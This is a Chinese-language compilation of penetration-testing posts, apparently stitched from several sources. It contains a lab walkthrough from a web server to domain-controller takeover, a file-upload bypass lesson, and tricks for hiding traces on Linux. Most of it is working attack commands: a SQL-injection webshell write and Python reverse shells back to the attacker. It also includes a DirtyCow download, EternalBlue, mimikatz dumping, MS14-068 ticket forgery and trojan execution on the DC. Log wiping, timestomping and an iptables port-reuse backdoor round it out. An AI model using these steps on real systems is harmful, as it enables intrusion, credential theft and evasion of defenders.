扑环境

1. Kali Linux（攻击机）
2. Centos6.4（web服务器）
3. win7（域成员主机无法上网）
4. win2008R2（域控无法上网）

目的

通过Kali Linux拿到域控权限

2021最新整理网络安全\渗透测试/安全学习（全套视频、大厂面经、精品手册、必备工具包）一>关注我，私信回复"资料"获取<一

Web渗透

目录扫描

使用dirbuster工具扫描网站根目录
设置kali默认字典文件/usr/share/wordlists/dirbuster/directory­list­lowercase­2.3­small.txt

扫描获得phpinfo.php

得到网站绝对路径信息

SQL查询报错

通过测试发现存在sql整型注入报错情况，进一步获取webshell

SQL注入

通过sqlmap测试发现存在sql注入

sqlmap ‐u "http://IP:8888/newsshow.php?cid=4&id=19*" ‐‐dbms MYSQL ‐v3

获取webshell

这里有绝对路径的情况下，可直接写入webshell。这里使用sqlmap os­shell的功能

sqlmap(os­shell)

#通过sqlmap获取命令执行会话
sqlmap ‐u “http://IP/newsshow.php?cid=4&id=19*” ‐‐dbms MYSQL ‐v3 ‐‐os‐ shell`

直接写webshell(pass)

http://IP/newsshow.php?cid=4&id=19 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,0x3c3f706870206576616c28245f504f53545b2770617373275d29 3f3e,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 into outfile '/var/www/html/webshell.php'

反弹shell

为了更好做后续操作，进行反弹shell

获取目标系统信息

os‐shell> uname ‐a
os‐shell> whereis python`

获取meterpreter会话

由于网站上为linux默认安装python，可直接生成python反弹脚本

#生成python反弹脚本
msfvenom ‐p python/meterpreter/reverse_tcp LHOST=IP LPORT=4444 ‐f raw
#msf监听反向连接会话
msfconsole
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp set LHOST IP
set LPORT 4444
run
#msf监听快速启动
cat py_reverse_tcp.rc
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp set LHOST 192.168.0.17
set LPORT 4444

exploit
msfconsole ‐r py_reverse_tcp.rc

#在sqlmap os‐shell模式下执行python meterpreter反弹脚本

os‐shell> python ‐c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF‐8')} [sys.version_info[0]] ('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQ0KZm9yIHggaW4gcmFuZ2UoMTApOg0KCXRy eToNCgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQ0KCQlzLmNvbm 5lY3QoKCYjMzk7SVAmIzM5Oyw0NDQ0KSkNCgkJYnJlYWsNCglleGNlcHQ6DQoJCXRpbWUu c2xlZXAoNSkNCmw9c3RydWN0LnVucGFjaygmIzM5OyZndDtJJiMzOTsscy5yZWN2KDQpKV swXQ0KZD1zLnJlY3YobCkNCndoaWxlIGxlbihkKSZsdDtsOg0KCWQrPXMucmVjdihsLWxl bihkKSkNCmV4ZWMoZCx7JiMzOTtzJiMzOTs6c30pDQo=')))"

nc+python反弹

#kali监听会话

root@kali:~# nc ‐lvvp 6666
#在sqlmap os‐shell模式下执行python bash反弹脚本
os‐shell> python ‐c "import os;import pty;import socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((' IP',6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.filen o(),2);os.putenv('HISTFILE','/dev/null');pty.spawn('/bin/bash');s.clos e();"` 

sqlmap执行:

监听端口返回反弹shell结果:

提权

拿到shell后，尝试提升权限

查看当前内核版本

通过uname ­a获取当前系统内核版本

使用已知漏洞提权

根据可已知内核漏洞下载对应的提权程序(该处使用脏牛内核提权)

cd /tmp/ wget ‐‐no‐check‐certificate https://raw.githubusercontent.com/K3vinPlus/sundry/master/DirtyCow/dir ty.c gcc ‐pthread dirty.c ‐o dirty ‐lcrypt ./dirty 123456

获得firefart用户，权限为root

su firefart

切换用户为firefart后，将passwd恢复,避免root用户无法使用

mv /tmp/passwd.bak /etc/passwd

横向渗透

通过查看网卡信息后发现存在内网地址信息

内网代理

meterpreter自动路由(首选)

meterpreter > run autoroute ‐s 10.0.1.0/24 meterpreter > run autoroute ‐p

reGeorg+proxychains

由于web服务器第二张网卡无法上网，需进行内网代理

在web服务器的shell下，下载tunnel.nosocket.php文件，做代理流量

1、网络下载 wget ‐‐no‐check‐certificate https://raw.githubusercontent.com/K3vinPlus/reGeorg/master/tunnel.noso cket.php mv tunnel.nosocket.php /var/www/html/ 2、本地上传 upload /root/reGeorg/tunnel.nosocket.php /var/www/html

可正常访问tunnel.nosocket.php文件

[

Kali上执行reGeorg代理脚本

python reGeorgSocksProxy.py ‐p 9999 ‐u http://IP:8888/tunnel.nosocket.php

修改proxychains配置文件，在末行添加socks信息。

vim /etc/proxychains.conf socks5 127.0.0.1 9999

##msf自带代理设置

setg Proxies socks5:127.0.0.1:9999

内网资产扫描

端口扫描

使用msf自带端口扫描模块，探测出10.0.1.9和10.0.1.254都存在445、3389端口。

use auxiliary/scanner/portscan/tcp set RHOSTS 10.0.1.1/24 set PORTS 21,22,23,80,389,445,873,1433,1521,2049,2181,2375,3306,3389,4899,5432,5 631,5900,5938,5984,6379,8000,8080,7001,9080,9200,10051,11211,20880,270 17,50070 set THREADS 10 exploit

10.0.1.9 IP端口开放情况

10.0.1.254 IP端口开放情况

MS17­010漏洞主机扫描

通过代理方式，使用msf框架扫描内网网段中存在MS17­010漏洞主机

root@kali:~# proxychains msfconsole use auxiliary/scanner/smb/smb_ms17_010 set RHOST 10.0.1.0‐254 set threads 10 exploit

MS17­010漏洞利用

通过meterpreter路由方式，background之后使用ms17­010攻击模块进行攻击

use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp set RHOSTS 10.0.1.9 run

域渗透

信息收集

查看当前主机信息

meterpreter > sysinfo

获取当前域

使用mimikatz获取密码

加载mimikatz模块

meterpreter > load mimikatz #读取内存中存放的账号密码明文信息 meterpreter > wdigest

获取域账号SID

meterpreter > run post/windows/gather/enum_logged_on_users

域控定位

net group "domain controllers" /domain ping dc1.kevin.com

MS14­068

python脚本生成票据

proxychains python ms14‐068.py ‐u liujiafeng@kevin.com ‐s S‐1‐5‐21‐ 4289546598‐4075965387‐827630551‐1111 ‐d 10.0.1.254 ‐p kevin@123

msf模块生成票据

use auxiliary/admin/kerberos/ms14_068_kerberos_checksum set DOMAIN KEVIN.com set USER liujiafeng set PASSWORD kevin@123 set USER_SID S‐1‐5‐21‐4289546598‐4075965387‐827630551‐1111 set RHOST 10.0.1.254

本地生成kirbi文件

#kali切换目录到loot下将ms14‐068 bin票据复制到物理机 /root/.msf4/loot/ #物理机通过mimikatz转为kirbi文件 mimikatz # kerberos::clist 20191223050146_default_10.0.1.254_windows.kerberos_122860.bin /export

kirbi转为ccache

#再将kirbi文件放到kali ticket_converter转换脚本目录下 #将kirbi文件转为ccache python ticket_converter.py 0‐00000000‐liujiafeng@krbtgt‐KEVIN.COM.kirbi TGT_liujiafeng@kevin.com.ccache mv TGT_liujiafeng@kevin.com.ccache /root/pykek/

生成正向连接的msf test.exe木马

生成msf监听端口程序

msfvenom ‐p windows/x64/meterpreter/bind_tcp LHOST=10.0.1.254 LPORT=4444 ‐f exe ‐o /root/pykek/test.exe

新建一个msf会话监听正向连接payload

use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp set RHOST 10.0.1.254

上传利用工具

上传利用工具、ms14­086黄金票据到win7跳板机上

upload /root/pykek/TGT_liujiafeng@kevin.com.ccache C:/users/kevin upload /usr/share/windows‐resources/mimikatz/x64/mimikatz.exe C:/Users/kevin upload /root/pykek/test.exe c:/users/kevin shell

票据导入

在win7跳板机上执行

`#清空票据 klist purge
#导入票据

cd c:/users/kevin
mimikatz.exe
kerberos::ptc TGT_liujiafeng@kevin.com.ccache

复制木马到域控

再通过win7跳板机复制test.exe到域控c盘，并通过at命令添加定时任务执行test.exe

`copy test.exe \dc1.kevin.com\c$ dir \dc1.kevin.com\c<pre class=“copy-codeblocks” style=“font-family: Consolas, Menlo, Monaco, “Lucida Console”, “Liberation Mono”, “DejaVu Sans Mono”, “Bitstream Vera Sans Mono”, “Courier New”, monospace; font-size: 15.008px; display: block; position: relative; overflow: visible; color: rgb(34, 34, 34); font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); text-decoration-style: initial; text-decoration-color: initial;”

在域控上添加at定时任务执行木马

net time \dc1.kevin.com at \dc1.kevin.com 15:42:00 c:\test.exe

查看当前域控at定时任务

at \dc1.kevin.com

在域控at定时任务执行后，连接域控4444端口

netstat ‐ano |findstr "4444"

所有获得的meterpreter会话

清除痕迹

结束msf木马进程，删除exe进程

at \dc1.kevin.com 16:23:00 cmd /c del c:\test.exe

删除win7工具

cd c:/users/kevin rm TGT_liujiafeng@kevin.com.ccache rm mimikatz.exe

windows删除系统日志

clearev

章来源：知了堂冯老师

0 声明

1.本课程涉及的所有信息安全攻击技术等内容均作为教育和学习之用，不得用于其他用途，否则后果自负。

2.本课程中所涉及的所有软件工具均来自互联网，本着互联网的共享精神可以提供给学员，但仅限于教育和学习之用，不得用于其他用途。

1 中华人民共和国网络安全法（2017年6月1日施行）

第十二条

任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得危害网络安全，不得利用网络从事危害国家安全、荣誉和利益，煽动颠覆国家政权、推翻社会主义制度，煽动分裂国家、破坏国家统一，宣扬恐怖主义、极端主义，宣扬民族仇恨、民族歧视，传播暴力、淫秽色情信息，编造、传播虚假信息扰 乱经济秩序和社会秩序，以及侵害他人名誉、隐私、知识产权和其他合法权益等活动。

第四十四条

任何个人和组织不得窃取或者以其他非法方式获取个人信息，不得非法出售或者非法向他人提供个人信息。

2 中华人民共和国刑法（节选）

第二百八十五条

【非法侵入计算机信息系 统罪】 违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的， 处三年以下有期徒刑或者拘役。

第二百八十六条

【破坏计算机信息系统罪】 违反国家规定，对计算机信息系统功能进行删除、修改、增加、干扰，造成计算机信息 系统不能正常运行，后果严重的，处五年以下有期徒刑或者拘役;后果特别严重的，处五年以上有期徒刑。

3 本课程面向的主要群体：

本课程主要面向立志从事网络安全相关岗位，立志从事安全行业人员，对web安全及渗透测试有兴趣的入坑人员。本课程初步设计主要对象为零基础入坑学员，由于技术有限，请多多指正。

0 上传漏洞介绍

在现代互联网的web应用程序中，上传文件是一种常见的功能，因为它有助于提高业务效率，比如企业的OA系统，允许用户上传图片、视频、头像和许多其他类型的文件。然而向用户提供的功能越多，web应用受到攻击的风险就越大，如果web应用存在文件上传漏洞，那么恶意用户就可以利用文件上传漏洞将可执行脚本程序上传到服务器中，获取网站的权限，或者进一步危害服务器。

·为什么文件上传存在漏洞

上传文件时，如果服务器代码未对客户端上传的文件进行严格的验证和过滤，就容易造成可以上传任意文件的情况，包括上传脚本文件(asp、aspx、php、jsp等格式的文件)。

·危害

非法用户可以利用上传的恶意脚本文件控制整个网站，甚至控制服务器。这个恶意的脚本文件，又称之为webshell，也可将webshell脚本称为一种网页后门，webshell脚本具有强大的功能，比如查看服务器目录，服务器中的文件，执行系统命令等。

1 案例讲解

2 JS检测绕过攻击

JS检测绕过上传漏洞常见于用户选择文件上传的场景，如果上传文件的后缀不被允许，则会弹框告知，此时上传文件的数据包并没有发送到服务器端，只是在客户端。览器使用JavaScript对数据包进行检测。

这时有两种方法可以绕过客户端JavaScript的检测

·使用浏览器的插件，删除检测文件后缀的JS代码，然后上传文件即可绕过。

·把需要上传文件的后缀改称允许上传的，如JPG,PNG等，绕过JS的检测，再抓包，把后缀名改成可执行文件的后缀即可上传成功。

（注：除了删除代码这个绕过方法，还有很多，比如ie的禁用脚本功能或者火狐的noscript插件或者删除代码中的JS引用）

3 JS检测绕过攻击分析

客户端上传文件的HTML代码如下，在选择文件时，会调用JS的selectFile函数，函数的作用是先将文件名转换为小写，然后通过substr获取文件名最后一个点号后面的后缀(包括点号)。如果后缀不是”jpg”,则会弹窗提示“请选择jpg格式的照片上传”。

服务器处理上传文件的代码如下所示。如果上传文件没有错，再通过file_exists判断在upload目录下文件是否已存在，不存在的话就通过move_uploaded_file将文件保存到upload目录。此PHP代码中没有对文件后缀做任何判断，所以只需要绕过前端JS校验就可以上传webshell

4 文件后缀绕过攻击

文件后缀绕过攻击是服务器代码中限制了某些后缀的文件不允许上传，但是有些apache是允许其他文件后缀的，例如在http.conf中，如果配置有如下代码，则能够解析php和phtml文件AddType application/x-httpd-php .php .phtml。

所以可以上传一个后缀为phtml的webshell如 abc.php.phtml。

在apache的解析顺序中，是从右到左开始解析文件后缀的，如果最右侧的扩展名不识别，就继续往左判断，直到遇到可以解析的文件为止，所以如果上传的文件名类似abc.php.xxx,因为后缀xxx不可以解析，所以向左解析后缀php。

服务端处理上传文件的代码如下所示。通过函数pathinfo()获取文件后缀，将后缀，将后缀转换为小写之后，判断是不是“php”，如果上传文件的后缀是php，则不允许上传，所以此处可以通过利用apache解析顺序或上传phtml等后缀的文件绕过该代码限制。

5 文件类型绕过攻击

在客户端上传文件时，通过burp suite抓取数据包，当上传一个php格式的文件时，可以看到数据包中的Content-Type的值是application/octet-stream，而上传jpg格式的文件时，数据包中的content-Type的值是image/jpeg。

如果服务器端代码是通过content-type的值来判断文件的类型，那么就存在被绕过的可能，因为content-type的值是通过客户端传递的，是可以任意修改的。所以当上传一个php文件时，在burpsuite中将content-type修改为image/jpeg，就可以绕过服务端的检测。

今天就先更新到这儿了，未完待续！！！请持续关注~~

藏历史操作命令

linux中可以使用history查看shell中历史输入的命令。如果我们希望在shell中执行的命令不被记录在命令行历史中，如何在linux中开启无痕操作模式呢？

#禁用历史记录功能
[space]set +o history
备注：[space] 表示空格。并且由于空格的缘故，该命令本身也不会被记录

#重新开启历史记录功能
[space]set -o history

#删除具体的某个记录
history -d 数组

上面的命令会临时禁用历史功能，这意味着在这命令之后你执行的所有操作都不会记录到历史记录中

隐藏文件/文件夹

1. 创建隐藏文件或者文件夹

touch .123.txt
mkdir .a
#文件名/夹前面加一个 点 就代表是隐藏文件/夹

修改文件时间戳

linux下藏后门必须要修改时间，否则很容易被发现，直接利用 touch 就可以了。假设我们上传了一个隐藏后门.webshell.php

1. 上传后门

明显看到.webshell.php时间戳不一样，ls-al，查看到的时间为文件修改的时间

我们还可以使用stat命令来查看文件具体的时间戳

stat 文件名

在Linux中，没有文件创建时间的概念。只有文件的访问时间、修改时间、状态改变时间。也就是说不能知道文件的创建时间。但如果文件创建后就没有修改过，修改时间=创建时间

stat查看时间戳有三种时间属性

2. 修改时间戳

直接利用 touch 就可以，比如参考 index.php 的时间，再赋给 .webshell.php，结果两个文件的时间就一样了

touch -r index.html .webshell.php

连接webshell，可见隐藏文件也可以进行连接的。

隐藏权限

在Linux中，使用chattr命令来防止root和其他管理用户误删除和修改重要文件及目录，此权限用ls -l是查看不出来的，从而达到隐藏权限的目的。

这个技巧常被用在后门，变成了一些难以清除的后门文件。

chattr +i .webshell.php 锁定文件，此时无法查看
lsattr .webshell.php 属性查看
chattr -i .webshell.php 解除锁定
rm -rf .webshell.php 删除文件

隐藏远程SSH登陆记录

在linux中可以使用last查看账号ssh登录情况

last|grep root

当我们用ssh进行登录时，就会记录，信息包括登录的账号，远程登录的主机，登录时间

ssh加上-T参数，可以进行隐藏登录记录，不被w、who、last等指令检测到

ssh -T -i id_rsa root@192.168.110.131 /bin/bash -i

清除last记录

echo “”>/var/log/wtmp

此时即看不到用户登录信息

端口复用

端口复用是指不同的应用程序使用相同端口进行通讯。我们可以通过端口复用来达到隐藏端口的目的。其他作用还有很多，如内网渗透中，搭建隧道时，服务器仅允许指定的端口对外开放。利用端口复用可以将3389或22等端口转发到如80端口上，以便外部连接。

1. 利用IPTables进行端口复用

假设主机开放的web服务是80端口，在被拿下的主机上执行如下命令

# 创建端口复用链
iptables -t nat -N LETMEIN
# 创建端口复用规则，将流量转发至 22 端口
iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22
#开启开关，如果接收到一个含有 threathuntercoming 的 TCP 包，则将来源 IP 添加到加为 letmein 的列表中
iptables -A INPUT -p tcp -m string --string 'threathuntercoming' --algo bm -m recent --set --name letmein --rsource -j ACCEPT
#关闭开关，如果接收到一个含有 threathunterleaving 的 TCP 包，则将来源 IP 从 letmein 的列表中移除
iptables -A INPUT -p tcp -m string --string 'threathunterleaving' --algo bm -m recent --name letmein --remove -j ACCEPT
# let's do it，如果发现 SYN 包的来源 IP 处于 letmein 列表中，将跳转到 LETMEIN 链进行处理，有效时间为 3600 秒
iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN

攻击者的linux系统上执行如下

#开启复用
echo threathuntercoming | socat - tcp:192.168.110.131:80
#ssh使用80端口进行登录
ssh -p 80 root@192.168.110.131 -T /bin/bash -i
#关闭复用，此时不能用80端口进行ssh连接
echo threathunterleaving | socat - tcp:192.168.110.131:80

连接目标80端口成功连接ssh

ps：进行端口复用后同时也可以用默认的22端口进行ssh连接

原文链接：https://blog.csdn.net/qq_44159028/article/details/124196458